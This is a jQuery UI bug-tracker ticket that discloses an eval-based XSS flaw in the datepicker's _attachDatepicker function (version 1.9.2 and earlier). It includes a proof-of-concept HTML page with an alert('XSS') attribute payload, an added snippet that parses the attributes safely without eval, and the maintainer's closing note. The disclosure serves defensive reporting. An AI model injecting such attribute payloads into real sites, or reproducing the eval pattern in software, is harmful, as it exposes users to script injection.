#14731 closed bug (worksforme)
Opened October 18, 2015 07:24AM UTC
Closed October 18, 2015 09:26AM UTC
XSS Vulnerability on _attachDatepicker function
| Reported by: | phatly27 | Owned by: | |
|---|---|---|---|
| Priority: | minor | Milestone: | none |
| Component: | ui.datepicker | Version: | 1.9.2 |
| Keywords: | | Cc: | |
| Blocked by: | | Blocking: | |
Description
VULNERABILITY DETAILS
A potential bug enables us to inject XSS content into an attribute (with the format "date:[PROPERTY_IN_DEFAULTS_DATEPICKER]") of any HTML element using the _attachDatepicker function of the ui.datepicker component. This function uses the eval syntax to evaluate the JavaScript code dynamically.
VERSION
Any site using the older versions, from version 1.9.2 back to the lowest version.
REPRODUCTION CASE
1. Create a new HTML page.
2. Inject this content into the new page.
```html
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
    <title></title>
    <script src="https://code.jquery.com/jquery-2.1.4.min.js"></script>
    <script src="https://code.jquery.com/ui/1.9.2/jquery-ui.min.js"></script>
    <script>
        $(document).ready(function () {
            $.datepicker.setDefaults({ buttonText: 'abcde' });
            $.datepicker._attachDatepicker(document.getElementById("abc"));
            $('#datepicker').datepicker();
        });
    </script>
</head>
<body>
    <div id="abc" date:buttonText="alert('XSS')">
        <input name="datepicker" id="datepicker" type="text"/>
    </div>
</body>
</html>
```
3. An alert popup was shown.
4. Completed.
IN CONCLUSION
We expect that the alert popup shouldn't be displayed and that the eval syntax should be removed instead. If it is displayed, any attacker can take advantage of it by injecting malicious XSS content into the website.
Please see details here: http://jsfiddle.net/wanc8t9g/.
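As an added illustration (not part of the ticket and not jQuery UI's code), the snippet below shows the mitigation the report asks for: reading `date:<option>` inline attributes without `eval`, accepting only JSON literals whose type matches the option's default and keeping anything else as an inert string. The names `DEFAULTS`, `parseInlineValue`, `readInlineSettings` and `makeElement` are hypothetical, and the element stub is constructed so the code runs without a DOM.

```javascript
"use strict";

// Constructed stand-in for a subset of the datepicker defaults (hypothetical).
const DEFAULTS = {
  buttonText: "...",
  numberOfMonths: 1,
  showButtonPanel: false,
};

// Parse one attribute value without executing it. JSON literals are accepted
// only when their type matches the default; non-JSON text stays a plain string.
function parseInlineValue(raw, defaultValue) {
  let value;
  try {
    value = JSON.parse(raw);
  } catch (e) {
    value = raw; // not a JSON literal: keep the text as-is, never evaluate it
  }
  if (value === null || typeof value !== typeof defaultValue) {
    return undefined; // type mismatch (e.g. object for a number): ignore it
  }
  return value;
}

// Collect "date:<name>" attributes for known option names only.
function readInlineSettings(element, defaults) {
  const settings = {};
  for (const name of Object.keys(defaults)) {
    const raw = element.getAttribute("date:" + name);
    if (raw === null) continue;
    const value = parseInlineValue(raw, defaults[name]);
    if (value !== undefined) settings[name] = value;
  }
  return settings;
}

// Constructed element stub exposing only getAttribute (hypothetical helper).
function makeElement(attrs) {
  return {
    getAttribute: (n) =>
      Object.prototype.hasOwnProperty.call(attrs, n) ? attrs[n] : null,
  };
}

const sample = makeElement({
  "date:buttonText": "alert('XSS')", // the ticket's payload: stays a string
  "date:numberOfMonths": "2",        // JSON number matching the default type
  "date:showButtonPanel": "true",    // JSON boolean matching the default type
  "date:nonexistent": "1",           // unknown option: never read
});
const parsed = readInlineSettings(sample, DEFAULTS);
```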
Attachments (0)
Change History (1)
Changed October 18, 2015 09:26AM UTC by comment:1
| resolution: | → worksforme |
|---|---|
| status: | new → closed |
None of these versions are supported any more. Any site using such an old version isn't going to be any safer even if we released a new 1.9.x, which we won't. I'm closing as works for me since it has already been fixed for a long time.